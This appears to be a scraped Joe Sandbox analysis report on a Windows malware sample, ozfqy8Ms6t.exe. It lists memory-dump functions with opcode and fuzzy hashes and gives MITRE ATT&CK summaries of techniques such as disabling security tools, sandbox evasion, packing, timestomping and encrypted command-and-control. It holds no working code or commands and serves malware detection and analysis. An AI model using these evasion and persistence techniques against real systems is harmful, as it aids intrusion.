Instruction Fuzzy Hash: F9C02B3100420857C7073B90E94F3C47F2ACB04211FA10064F44CA0640CFBD70105A36

Function 0542B288 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b79ef31ef2dbe340283568be6073165107b5499cda4e5ed4f536e06d4100aa62
Instruction ID: 5e6680b41a6638148c18b7fb6a2c298dde42d8095019f71cf1a3998c36abd510
Opcode Fuzzy Hash: b79ef31ef2dbe340283568be6073165107b5499cda4e5ed4f536e06d4100aa62
Instruction Fuzzy Hash: 33D012764645558FC3058F64EE8ACE537B0FF15226B1680E2E508CB373D3708D95CB14

Function 0543409D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97004e0185dbc3a6a468e1bb31f6b855d30db32c604a34e030a9a1a50799ad2
Instruction ID: 4cd2414b98c4e4e2d8c1198567a051c57d04b9847694a9a7be34c071756465d6
Opcode Fuzzy Hash: e97004e0185dbc3a6a468e1bb31f6b855d30db32c604a34e030a9a1a50799ad2
Instruction Fuzzy Hash: 2AD0C9307080148BDB009A90CA4B5FD3BF3FB4C346F00045298029A265DA64D8468A01

Function 05428E80 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcaa9f4a78c471cd9fd0afd4c852a97d006b3986547a0ce8142763ab039a4417
Instruction ID: be4b529022719d4b3a251d4f2d534544ce2593ca51de10bbac5bd8670e709d0b
Opcode Fuzzy Hash: fcaa9f4a78c471cd9fd0afd4c852a97d006b3986547a0ce8142763ab039a4417
Instruction Fuzzy Hash: 6BB0121D14043342D821A060C88B3D430149340042FD4D636C100C61C2CB05C0035492

Function 05436395 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7048a9b50bfd35fd5542df0afcab0bf8f33076225fb55b1519c5bb1cb5c97e
Instruction ID: fad7b4f52b52ffa60d772fbd20abbb878e04066a96a14684bcda25273a226f4f
Opcode Fuzzy Hash: 6c7048a9b50bfd35fd5542df0afcab0bf8f33076225fb55b1519c5bb1cb5c97e
Instruction Fuzzy Hash: CFD0EA79A04624CFD790CB24C984B98B7B2AB4D310F1181E9D50EA7375D734AE85CF46

Function 0542B298 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 0543958C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a6f2aeee520e1d08e0288d11b7fe210001ae59469b8591c1ca02f1933cf304
Instruction ID: aee00cfab6fcbcc01b7c20a96a47cb3473b67e8b1c503b2e767a63ec6c7e4c1e
Opcode Fuzzy Hash: 15a6f2aeee520e1d08e0288d11b7fe210001ae59469b8591c1ca02f1933cf304
Instruction Fuzzy Hash: F3B09237A00019868A00DA88F4404DCBB30DAD4332F004033C201620008620156A8660

Function 054316C8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdff8f852df8c86d54e3fd83b798f14b44556b8de4fe12d12347640d1f9ea8f2
Instruction ID: 63c36e3d57f1e26eb5adbf4941b22bb09862508f8ed63c1befcc55bedfe22df7
Opcode Fuzzy Hash: bdff8f852df8c86d54e3fd83b798f14b44556b8de4fe12d12347640d1f9ea8f2
Instruction Fuzzy Hash: CBA0223000820C8BC3833BF2320FACCBF2E8C0C222BA00082F00C000022EBE30008EBB

Function 05421C00 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da1b05baea3522ca08f78280058b78f71765de944b811989ac9a8f2cbe723b5
Instruction ID: fdea5ce8d077df9b93feb48d872b291d52e56a424c1e6fba6e15b32122fe0045
Opcode Fuzzy Hash: 4da1b05baea3522ca08f78280058b78f71765de944b811989ac9a8f2cbe723b5
Instruction Fuzzy Hash: EAC09B7252005297F7058F21F4577D57B30F751304F515470E405C6145D6359469C76D

Function 057A6B38 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603356836.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_57a0000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60b6e3027d068aa7fc4b13887721b0c2b2d1b81ad2714e0cfb7add031ec0ef8
Instruction ID: 8a927881a1433d400e816c6cb625f138f90c9ef865a1d4e69456bf3471bc82fe
Opcode Fuzzy Hash: c60b6e3027d068aa7fc4b13887721b0c2b2d1b81ad2714e0cfb7add031ec0ef8
Instruction Fuzzy Hash: E6C04C252092944FD701475484683953F629B9E322F041595944156686C5555881D622

Function 0543D3C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45139155c96211cadda0dd1f73d7fd4b7d01c8107821b373b238e12c8f46b8ea
Instruction ID: b0e6c446980f81da323e318dd68ac052a5b96ee6ac39d92b11c8b5df91aed878
Opcode Fuzzy Hash: 45139155c96211cadda0dd1f73d7fd4b7d01c8107821b373b238e12c8f46b8ea
Instruction Fuzzy Hash: A09002710D460C9B568027A5740A5957F5CA5449267800151B50D419425E5A64A08595

Non-executed Functions

Function 05574DD0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V[n, xrefs: 05575087

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID: \V[n
API String ID: 0-1005319620
Opcode ID: 2c0c5a389ba46ad6b3ad886734638b9489a9c056e2659c1fe2241c3dcf2d2e3c
Instruction ID: 9c9114ef732bed7cb2884487f738f9dc00f1553337957f6c2db8515f66a6af09
Opcode Fuzzy Hash: 2c0c5a389ba46ad6b3ad886734638b9489a9c056e2659c1fe2241c3dcf2d2e3c
Instruction Fuzzy Hash: F8B14B70E0025DDFDF10CFA9E895BAEBBF2BF88314F148529D815A7294EB749845CB81

Function 05421470 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0016811d8e0e9178b03e4f72f788543b0e21bece56057c09e4238134119b54f8
Instruction ID: 60201202fea0ad483e0b3764c4c4962a181ceab0d8ec30fe8fe8e10b4989f73f
Opcode Fuzzy Hash: 0016811d8e0e9178b03e4f72f788543b0e21bece56057c09e4238134119b54f8
Instruction Fuzzy Hash: 65D13D34A00225CFDB14CF69C584AAEBBF2BF88311F69D59AE5059B361CB35EC81CB50

Function 05438528 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f1aafedbaa3a9d955d51c951687b2a012ae9fb9c4f57d1b2dd269742736a98
Instruction ID: 65a4c4f37e41716f0e13362de4f5b6882ad1f0ab0bf86657c62ea89faf27e51a
Opcode Fuzzy Hash: 05f1aafedbaa3a9d955d51c951687b2a012ae9fb9c4f57d1b2dd269742736a98
Instruction Fuzzy Hash: A3C18171E011298FDB15CBA9C981AEEFBF2FB88304F24856AE455E7215D734ED42CB90

Function 02C34960 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e53d6aa3f7521504b630d07e2d925a9335010e1e71596ddf7f682b327dd741
Instruction ID: 8bc56669b5b7305baeddfc667b7d0a5f308b290bbdae947d4ba3d7a9bb64fd64
Opcode Fuzzy Hash: e3e53d6aa3f7521504b630d07e2d925a9335010e1e71596ddf7f682b327dd741
Instruction Fuzzy Hash: 84B18071E005298FDB29CBA9D8806ADFBF1FB88304F588669D455F7206D734ED42CBA4

Function 02C3494B Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633d4b2d780f7a3a6c65d72f0b1d77198497efeff44d677e2387c3fa5fb47684
Instruction ID: d525f50e3f8375f9a3bee194051fe73c9841266445e7c3e1f2c9212509d794c2
Opcode Fuzzy Hash: 633d4b2d780f7a3a6c65d72f0b1d77198497efeff44d677e2387c3fa5fb47684
Instruction Fuzzy Hash: D1816171E045298FDB29CFA9C8806ADFBF1FF88314F188669D465E7241D734E946CBA0

Function 05438519 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a862b4d8deeacbbae5d3c8c631c11f572fa1ec6fa15d0d963b9b5f3eaa72c6
Instruction ID: 6bc9ddf605934d793e4c58dc363bf27f1b611e2f7562762dcd1189e44d0a6ef4
Opcode Fuzzy Hash: c0a862b4d8deeacbbae5d3c8c631c11f572fa1ec6fa15d0d963b9b5f3eaa72c6
Instruction Fuzzy Hash: 48716D71E015298BDB04CFA9C881AEEFBF2FB88314F14822AE415E7315D734E946CB90

Function 02C37248 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47048aed09326c176c87df005da3390bdf4afb3048028de9f01eb3899d7beaf9
Instruction ID: a07af0a5791a9f49f662d5b975ec6e6d0d0299982e01ea92c45400217adf8db1
Opcode Fuzzy Hash: 47048aed09326c176c87df005da3390bdf4afb3048028de9f01eb3899d7beaf9
Instruction Fuzzy Hash: EB613E70A056468BD748EFABE94069ABBF3BBD8304F44C13EC148AB268DF751845CF51

Function 02C31E5A Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ccdccb8cdb83e14b142aeb2d9c62449af90e734db4ca08d40865467c7ffae5
Instruction ID: e8652b0efa875cb76100fb9ca90977ad7b9cf786a4588109c8823186d2e389d8
Opcode Fuzzy Hash: e4ccdccb8cdb83e14b142aeb2d9c62449af90e734db4ca08d40865467c7ffae5
Instruction Fuzzy Hash: 0151FF75A006058FDB59EFABE84169A7BF3BBC8204F14C62EC1049B27DEF755445CB90

Function 05433236 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde83acd4b485b1a9483617580399899ee4042d0aafe0f4f053b676ed230cedb
Instruction ID: ec170a04a7f4d1bd147961ff07e83f2ac19536404cedb5e3c29264cc678e53bc
Opcode Fuzzy Hash: cde83acd4b485b1a9483617580399899ee4042d0aafe0f4f053b676ed230cedb
Instruction Fuzzy Hash: 8151C536D042148BDB04DFA8C8837EEBBB1FB48320F1985B7CD5AA7265C7359906C795

Function 02C37258 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3ee0c48be72a1011b807cf3ea17fea004f4421e13a71e33c35f7e5da3ec9c9
Instruction ID: 353c67783cdf7165285b28657c601a7fdc26906ab5579abca79eb2109943d1a7
Opcode Fuzzy Hash: bd3ee0c48be72a1011b807cf3ea17fea004f4421e13a71e33c35f7e5da3ec9c9
Instruction Fuzzy Hash: E3511C70A056468BD748EFABE94069ABBF3BBD8304F44C53EC148AB2A8DF7518458F51

Function 02C31E68 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4600229086.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c30000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3524ecc5272ed44c330a08c9a33b0a868d1209a97d5de5d8f12fb0c8b9d7db62
Instruction ID: 208b3dacf17176db8fddec85403f700c640c0903264db2f033af4f0ae75726df
Opcode Fuzzy Hash: 3524ecc5272ed44c330a08c9a33b0a868d1209a97d5de5d8f12fb0c8b9d7db62
Instruction Fuzzy Hash: 5F51ED74A006058FDB59EFABE85169ABBF3BBC8204F14C62EC1049B27DEF755845CB90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ozfqy8Ms6t.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
ozfqy8Ms6t.exe

Function 055726F8 Relevance: 1.7, APIs: 1, Instructions: 162
libraryCOMMON

Function 055724A8 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Function 055724B8 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 05574A88 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Function 05570B58 Relevance: .8, Instructions: 751
COMMON

Function 05572708 Relevance: 1.7, APIs: 1, Instructions: 152
libraryCOMMON

Function 05572842 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 054261F0 Relevance: 1.6, Strings: 1, Instructions: 345
COMMON

Function 02C3F758 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 0543E570 Relevance: 1.3, Strings: 1, Instructions: 67
COMMON

Function 02C3F908 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Function 05434D19 Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Function 0543194A Relevance: .7, Instructions: 661
COMMON

Function 05423080 Relevance: .5, Instructions: 534
COMMON